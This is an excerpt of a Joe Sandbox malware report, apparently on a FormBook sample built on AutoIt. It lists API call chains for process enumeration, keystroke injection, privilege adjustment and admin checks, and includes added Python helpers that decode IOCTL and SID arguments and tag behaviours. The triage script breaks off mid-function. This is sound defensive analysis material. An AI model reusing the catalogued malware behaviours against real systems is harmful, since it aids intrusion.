• bind.WSOCK32(00000000,?,00000010), ref: 006518DB
• WSAGetLastError.WSOCK32 ref: 006518E6
• closesocket.WSOCK32(00000000), ref: 00651915
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: b949e7ab7dac1f76446d7a530b82df59d8061833ef1082e7d50919c276c91992
• Instruction ID: 21f34ace4f3a658d0e3a636ee958fdd72c4dbd7409415ad90513daf6d591e0fe
• Opcode Fuzzy Hash: b949e7ab7dac1f76446d7a530b82df59d8061833ef1082e7d50919c276c91992
• Instruction Fuzzy Hash: FF51C575A002119FDB20EF28C88AF6A7BE6AB85718F04845DF9459F3C3D771AD41CBA1
APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 71be9c14f04c42888e4ad14088656b102e015e9d71d292bdb07fd74a6397b5d2
• Instruction ID: b6132443f79adac1692d9714746055467995ced7413c5f87e13fabc4fa95baf2
• Opcode Fuzzy Hash: 71be9c14f04c42888e4ad14088656b102e015e9d71d292bdb07fd74a6397b5d2
• Instruction Fuzzy Hash: E421D3317406015FD7208F1AC854BAA7BE6FF96324B1C8059E846CF351CBB5EC42CB94
Strings
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
• Opcode ID: 1efed9ddb98e1abf2765d94ca5c327f1ca9616483012b52709e8c64693c01d31
• Instruction ID: 3cc5ca700f83020143112caf83927ab2af2ec70c68af4c3dca0d1679d7edfe30
• Opcode Fuzzy Hash: 1efed9ddb98e1abf2765d94ca5c327f1ca9616483012b52709e8c64693c01d31
• Instruction Fuzzy Hash: 0AA22975A0061ACBDF34CF58C9407FDBBB2BB54314F2885AAE816A7385DB749D81CB90
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 006382AA
Strings
Similarity
• API ID: lstrlen
• String ID: ($tbi$|
• API String ID: 1659193697-2401483324
• Opcode ID: c0951e141b50cbfbbff2ec7e25916b7716a1e78331d3f9e1f2aafa0d1dc10ac5
• Instruction ID: e5778b384e7e027709ef94649779526286ca14f0b1163671bf64a7d50dd4ad00
• Opcode Fuzzy Hash: c0951e141b50cbfbbff2ec7e25916b7716a1e78331d3f9e1f2aafa0d1dc10ac5
• Instruction Fuzzy Hash: 4A323574A007059FDB28CF59C481AAAB7F1FF48710B15846EE49ADB3A1EB70E941CB80
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0065A6AC
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0065A6BA
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0065A79C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065A7AB
                                                                                  • Part of subcall function 005ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00613303,?), ref: 005ECE8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                • String ID:
                                                                                • API String ID: 1991900642-0
                                                                                • Opcode ID: a5c9e7504deaade8fdb249d509e7a2a9fa77eab37e0f38ff580c8c35821631b8
                                                                                • Instruction ID: 0257dd6760120d17d827509b0547a8d57a953c2232dbbc19c21c919960f19597
                                                                                • Opcode Fuzzy Hash: a5c9e7504deaade8fdb249d509e7a2a9fa77eab37e0f38ff580c8c35821631b8
                                                                                • Instruction Fuzzy Hash: EF5149715083019FD710EF28C88AA6BBBE9FFC9754F00891EF98597291EB70D904CB92
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0063AAAC
                                                                                • SetKeyboardState.USER32(00000080), ref: 0063AAC8
                                                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0063AB36
                                                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0063AB88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: f2c9d336b03205eee80c990fbfff03f7ee9930bafd57aa9a80233c3bbda2663b
                                                                                • Instruction ID: 6a88208de72fa8cf99593a60e0bfbae3fbe77cd3b97fb5c4e64eee4b62037a7b
                                                                                • Opcode Fuzzy Hash: f2c9d336b03205eee80c990fbfff03f7ee9930bafd57aa9a80233c3bbda2663b
                                                                                • Instruction Fuzzy Hash: BB31FA31A40648AFFB35CBA5CC05BFAB7A7AB44320F04421AF5C2962D1D3758981E7E6
                                                                                APIs
                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 0064CE89
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0064CEEA
                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 0064CEFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                • String ID:
                                                                                • API String ID: 234945975-0
                                                                                • Opcode ID: 4ecacd9f43b9267a1afe253917a6f64d98d40c8a1f2cbf5543d51daa0c01b1db
                                                                                • Instruction ID: cc50354eb3f34d0db98edb15956a35b4b52ad4b951387d12fe3c4c8ebace0e45
                                                                                • Opcode Fuzzy Hash: 4ecacd9f43b9267a1afe253917a6f64d98d40c8a1f2cbf5543d51daa0c01b1db
                                                                                • Instruction Fuzzy Hash: BE21BDB15017059BDB60DFA5C948BA67BFEEF40324F10442EE646E2351E774EE099B60
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0060271A
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00602724
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00602731
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: b2ef9f1306a3456d01160740bcdf5795580cef949363bffe58dbba6342937c69
                                                                                • Instruction ID: 9e5238334b0a16dbe3597e1698b8dd563a2980394f6a5dc24e94043c5d8aa574
                                                                                • Opcode Fuzzy Hash: b2ef9f1306a3456d01160740bcdf5795580cef949363bffe58dbba6342937c69
                                                                                • Instruction Fuzzy Hash: 1531C27495121DABCB21DF68DC887DDBBB8BF08310F5051EAE90CA62A1E7749F818F44
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 006451DA
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00645238
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 006452A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1682464887-0
                                                                                • Opcode ID: 6d775be69e06ed781dfdcf92faa94e5d844293df8083700a12a47bcbdd17dc99
                                                                                • Instruction ID: d40e685cc594e1f2f442e1212d840758fcbccd88e674258a9debc3abf8d0eff7
                                                                                • Opcode Fuzzy Hash: 6d775be69e06ed781dfdcf92faa94e5d844293df8083700a12a47bcbdd17dc99
                                                                                • Instruction Fuzzy Hash: 58318E35A00509DFDB00DF94D888EEEBBB5FF49314F04809AE805AB362DB71E946CB90
                                                                                APIs
                                                                                  • Part of subcall function 005EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005F0668
                                                                                  • Part of subcall function 005EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005F0685
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063170D
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063173A
                                                                                • GetLastError.KERNEL32 ref: 0063174A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 577356006-0
                                                                                • Opcode ID: 81cb7acdb95b1a8341ff4f375beb9332f3b9d245dc27c8dd9bc71171585c5648
                                                                                • Instruction ID: e8813f01b020372cc7269d62edc1fb9b1b25b71b0f9ec4ad409da34c8ec9a288
                                                                                • Opcode Fuzzy Hash: 81cb7acdb95b1a8341ff4f375beb9332f3b9d245dc27c8dd9bc71171585c5648
                                                                                • Instruction Fuzzy Hash: 401101B2400305AFD718AF54DC86D6ABBBEFB44724B20852EE09657241EB71BC428B60
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0063D608
                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0063D645
                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0063D650
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                • String ID:
                                                                                • API String ID: 33631002-0
                                                                                • Opcode ID: ec594526c1ebd9c2cd55cff72b22cba9afb376c3494828a6ede60a64e923e118
                                                                                • Instruction ID: bfb1058dfbcc41cf67b33e3dc45aef709c82aca9984a76b4cb178ffef800f105
                                                                                • Opcode Fuzzy Hash: ec594526c1ebd9c2cd55cff72b22cba9afb376c3494828a6ede60a64e923e118
                                                                                • Instruction Fuzzy Hash: F9118E71E01228BFDB108F95EC45FAFBBBDEB45B60F108111F914E7290C2B04A058BE1
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0063168C
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006316A1
                                                                                • FreeSid.ADVAPI32(?), ref: 006316B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: 775d9fee2cba085700ca3170a6ae20b78c9fe8a7ec6893055ee83948f864496c
                                                                                • Instruction ID: f78794315706a720195d8221aa50a546c4eb8552dc1969ea664b4f75e8e55ae7
                                                                                • Opcode Fuzzy Hash: 775d9fee2cba085700ca3170a6ae20b78c9fe8a7ec6893055ee83948f864496c
                                                                                • Instruction Fuzzy Hash: 9EF04471950308FBDB00DFE08D89AAEBBBDEB08210F404461E500E2180E371AA448A50
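The two calls above carry their interesting values as raw constants: DeviceIoControl with control code 0x2D1400, a 12-byte input buffer and a 40-byte output buffer, and AllocateAndInitializeSid with nSubAuthorityCount 2 and sub-authorities 0x20 and 0x220. The decoder below is an added example (not the report's or the sample's code) that unpacks a CTL_CODE into device type, function, method and access and names the IOCTL (0x2D1400 is IOCTL_STORAGE_QUERY_PROPERTY, and the buffer sizes match STORAGE_PROPERTY_QUERY and the fixed part of STORAGE_DEVICE_DESCRIPTOR, i.e. a bus-type/vendor query on a volume or disk handle), and rebuilds the SID that AllocateAndInitializeSid produces. The identifier authority only shows as "?" in the report, so SECURITY_NT_AUTHORITY (5) is an assumption; under it the sub-authorities 32 and 544 give S-1-5-32-544, BUILTIN\Administrators, which together with CheckTokenMembership is the standard "is the caller an administrator" check. The IOCTL table and well-known SID table are small and my own.

```python
"""Decode the numeric arguments Joe Sandbox recorded for the DeviceIoControl and
AllocateAndInitializeSid calls. Added example; not the report's or the sample's code."""
from dataclasses import dataclass
from typing import List, Tuple

# CTL_CODE(DeviceType, Function, Method, Access) = DeviceType<<16 | Access<<14 | Function<<2 | Method
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
                3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x04: "FILE_DEVICE_CONTROLLER", 0x07: "FILE_DEVICE_DISK",
                0x09: "FILE_DEVICE_FILE_SYSTEM", 0x2D: "FILE_DEVICE_MASS_STORAGE"}
KNOWN_IOCTLS = {  # small hand-picked table, extend as needed
    0x002D1400: "IOCTL_STORAGE_QUERY_PROPERTY",
    0x002D1080: "IOCTL_STORAGE_GET_DEVICE_NUMBER",
    0x00070000: "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    0x000700A0: "IOCTL_DISK_GET_DRIVE_GEOMETRY_EX",
    0x0004D004: "IOCTL_SCSI_PASS_THROUGH",
}
SIZEOF_STORAGE_PROPERTY_QUERY = 12     # PropertyId, QueryType, AdditionalParameters[1] (+ padding)
SIZEOF_STORAGE_DEVICE_DESCRIPTOR = 40  # fixed header; vendor/product strings follow in larger buffers


@dataclass
class Ioctl:
    code: int
    device_type: int
    function: int
    method: int
    access: int

    @property
    def name(self) -> str:
        return KNOWN_IOCTLS.get(self.code, "unknown IOCTL")

    def describe(self) -> str:
        dev = DEVICE_TYPES.get(self.device_type, f"0x{self.device_type:X}")
        return (f"{self.name}: {dev} function 0x{self.function:X} "
                f"{METHOD_NAMES[self.method]} {ACCESS_NAMES[self.access]}")


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Same arithmetic as the CTL_CODE macro in winioctl.h."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code: int) -> Ioctl:
    """Inverse of ctl_code(): split a control code into its four fields."""
    return Ioctl(code=code, device_type=(code >> 16) & 0xFFFF, function=(code >> 2) & 0xFFF,
                 method=code & 0x3, access=(code >> 14) & 0x3)


def explain_deviceiocontrol(code: int, in_size: int, out_size: int) -> str:
    """Describe a DeviceIoControl call from the values in the report line. For
    IOCTL_STORAGE_QUERY_PROPERTY also check that the buffer sizes fit the
    STORAGE_PROPERTY_QUERY input and STORAGE_DEVICE_DESCRIPTOR output structures."""
    io = decode_ioctl(code)
    text = io.describe()
    if io.code == 0x2D1400:
        ok = in_size == SIZEOF_STORAGE_PROPERTY_QUERY and out_size >= SIZEOF_STORAGE_DEVICE_DESCRIPTOR
        text += (" (buffer sizes fit STORAGE_PROPERTY_QUERY/STORAGE_DEVICE_DESCRIPTOR)"
                 if ok else " (unexpected buffer sizes)")
    return text


SECURITY_NT_AUTHORITY = 5  # ASSUMPTION: the report shows pIdentifierAuthority only as '?'
WELL_KNOWN_SIDS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
}


def sid_string(authority: int, sub_authorities: List[int]) -> str:
    return "S-1-" + "-".join(str(x) for x in [authority, *sub_authorities])


def sid_bytes(authority: int, sub_authorities: List[int]) -> bytes:
    """Binary SID as AllocateAndInitializeSid lays it out: Revision(1), SubAuthorityCount(1),
    IdentifierAuthority(6 bytes, big-endian), then each SubAuthority as a little-endian DWORD."""
    out = bytes([1, len(sub_authorities)]) + authority.to_bytes(6, "big")
    return out + b"".join(sa.to_bytes(4, "little") for sa in sub_authorities)


def decode_allocate_sid_call(args_after_authority: List[int],
                             authority: int = SECURITY_NT_AUTHORITY) -> Tuple[str, str]:
    """args_after_authority = nSubAuthorityCount followed by dwSubAuthority0..7, exactly as
    listed in the report; only the first nSubAuthorityCount of them are meaningful."""
    count = args_after_authority[0]
    subs = args_after_authority[1:1 + count]
    sid = sid_string(authority, subs)
    return sid, WELL_KNOWN_SIDS.get(sid, "not a well-known SID")


if __name__ == "__main__":
    # values taken from the two report lines above
    print(explain_deviceiocontrol(0x2D1400, 0xC, 0x28))
    print(decode_allocate_sid_call([2, 0x20, 0x220, 0, 0, 0, 0, 0, 0]))
```

The size check matters when reading such lines: a query property call with a 40-byte output buffer only retrieves the fixed STORAGE_DEVICE_DESCRIPTOR header (bus type, removable flag, string offsets), which is what a runtime needs to answer "is this drive fixed, removable or network"; a much larger buffer would indicate the caller also wants the vendor/product/serial strings.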
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(006028E9,?,005F4CBE,006028E9,006988B8,0000000C,005F4E15,006028E9,00000002,00000000,?,006028E9), ref: 005F4D09
                                                                                • TerminateProcess.KERNEL32(00000000,?,005F4CBE,006028E9,006988B8,0000000C,005F4E15,006028E9,00000002,00000000,?,006028E9), ref: 005F4D10
                                                                                • ExitProcess.KERNEL32 ref: 005F4D22
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 363d56d5da46dc876e6b7ab678932a5099975d2efc052091b0e51823ba5ddeea
                                                                                • Instruction ID: 37626a4e1ff3dffb2df72a662841e7a4adbbcb23f4e4c6cee9216540a1ea3689
                                                                                • Opcode Fuzzy Hash: 363d56d5da46dc876e6b7ab678932a5099975d2efc052091b0e51823ba5ddeea
                                                                                • Instruction Fuzzy Hash: 60E0B631000948ABDF11AF55DD09A6A3F6AFB85791B104018FD55DA222DB79DD42CE80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: /
                                                                                • API String ID: 0-2043925204
                                                                                • Opcode ID: 7a6fe53b73dc4c998cb735b1f10068260746f040ac6401afc988a4395e2d77b8
                                                                                • Instruction ID: 562609c18b3c9f334ce064558e8c399ff5ce641c84620fbb8f6cbeddc286d5f6
                                                                                • Opcode Fuzzy Hash: 7a6fe53b73dc4c998cb735b1f10068260746f040ac6401afc988a4395e2d77b8
                                                                                • Instruction Fuzzy Hash: 02414972540219AFCB289FB9CC49EFB77BAEB84324F10426DF905D72C0E6709E418B50
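Every function block in this section follows the same layout: an "APIs" header, bullet lines of the form Name.MODULE(args), ref: address, optionally indented "Part of subcall function" lines, and then "Memory Dump Source". That regularity makes it straightforward to turn a long report into a behaviour summary. The script below is an added example, not Joe Sandbox tooling: it parses those bullet lines, keeps direct and subcall APIs apart, and tags each function from a small rule table whose names are my own. Two caveats are built into the rules. The IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter triple is the MSVC CRT's fault-reporting sequence and is tagged as such rather than as anti-debugging; and because the report identifies the binary as a compiled AutoIt script, the chains in the 0x5D0000 image (process enumeration with a case-insensitive CompareStringW, keystroke injection through SendInput and WM_CHAR, the administrators-group check, the disk probe wrapped in SetErrorMode(SEM_FAILCRITICALERRORS)) are most likely the AutoIt runtime's built-ins rather than FormBook's own code, which only runs in the injected process. The sample input is copied from three of the blocks above.

```python
"""Triage helper for the per-function 'APIs' lists in a Joe Sandbox report.
Added example; not Joe Sandbox's code and not part of the analysed sample."""
import re
from typing import Dict, List, Set, Tuple

# One bullet line: optional 'Part of subcall function XXXX:' prefix, Name.MODULE, optional
# (args), optional comma, then 'ref: address'. Matches e.g.
#   • Process32FirstW.KERNEL32(00000000,?), ref: 0065A6BA
#   • ExitProcess.KERNEL32 ref: 005F4D22
API_LINE = re.compile(
    r"^\s*•\s+(?P<sub>Part of subcall function [0-9A-F]+:\s+)?"
    r"(?P<api>[A-Za-z_@0-9]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# (tag, all of these APIs must appear in the block, none of these may appear)
RULES: List[Tuple[str, Set[str], Set[str]]] = [
    # Toolhelp walk; in this report paired with CompareStringW(0x409, NORM_IGNORECASE) in a
    # subcall, i.e. a case-insensitive process-name lookup
    ("process-enumeration", {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}, set()),
    # SetKeyboardState + PostMessageW(WM_CHAR = 0x102) + SendInput: synthetic keystrokes
    ("keystroke-injection", {"SetKeyboardState", "SendInput"}, set()),
    ("privilege-adjust", {"LookupPrivilegeValueW", "AdjustTokenPrivileges"}, set()),
    ("admin-group-check", {"AllocateAndInitializeSid", "CheckTokenMembership"}, set()),
    # MSVC CRT fault-report stub (gs_report.c), not a hand-written debugger check
    ("crt-fault-report", {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}, set()),
    ("anti-debug", {"IsDebuggerPresent"}, {"SetUnhandledExceptionFilter"}),
    # SetErrorMode(1) = SEM_FAILCRITICALERRORS suppresses the 'no disk' dialog around the probe
    ("disk-probe", {"GetDiskFreeSpaceExW"}, set()),
    ("storage-ioctl", {"CreateFileW", "DeviceIoControl"}, set()),
    ("wininet-read", {"InternetReadFile"}, set()),
    ("crt-exit", {"GetCurrentProcess", "TerminateProcess", "ExitProcess"}, set()),
]


def parse_blocks(text: str) -> List[Dict]:
    """Split report text into function blocks. Each 'APIs' header opens a block; bullet lines
    fill it until the first non-bullet line ('Memory Dump Source', 'Strings', ...)."""
    blocks: List[Dict] = []
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"apis": [], "subcall_apis": [], "first_ref": None, "args": {}}
            blocks.append(current)
            continue
        m = API_LINE.match(line)
        if current is None or not m:
            if current is not None and stripped and not stripped.startswith("•"):
                current = None  # end of this block's API list
            continue
        target = current["subcall_apis"] if m.group("sub") else current["apis"]
        target.append(m.group("api"))
        # last occurrence wins for APIs called more than once (e.g. SetErrorMode)
        current["args"][m.group("api")] = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        if current["first_ref"] is None and not m.group("sub"):
            current["first_ref"] = int(m.group("ref"), 16)
    return blocks


def tag_block(block: Dict) -> List[str]:
    """Apply RULES to the union of direct and subcall APIs of one block."""
    seen = set(block["apis"]) | set(block["subcall_apis"])
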